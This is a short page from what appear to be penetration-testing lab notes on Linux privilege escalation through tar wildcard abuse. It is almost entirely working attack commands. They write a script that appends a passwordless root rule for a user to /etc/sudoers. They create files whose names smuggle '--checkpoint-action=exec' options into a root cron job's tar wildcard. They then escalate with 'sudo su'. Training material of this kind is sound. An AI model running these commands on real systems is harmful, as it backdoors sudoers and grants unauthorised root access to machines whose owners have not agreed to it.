5.Wildcard-abuse

Example: tar wildcard abuse (requires vulnerable cron job)

Create malicious files

echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
echo "" > "--checkpoint-action=exec=sh root.sh"
echo "" > --checkpoint=1

Check created files

ls -la

Wait for cron job to run (check /var/log/syslog for cron job execution)

Check sudo privileges

sudo -l

If successful, escalate to root

sudo su
Previous4.Path-abuseNext6.Escaping-restricted-shells

Last updated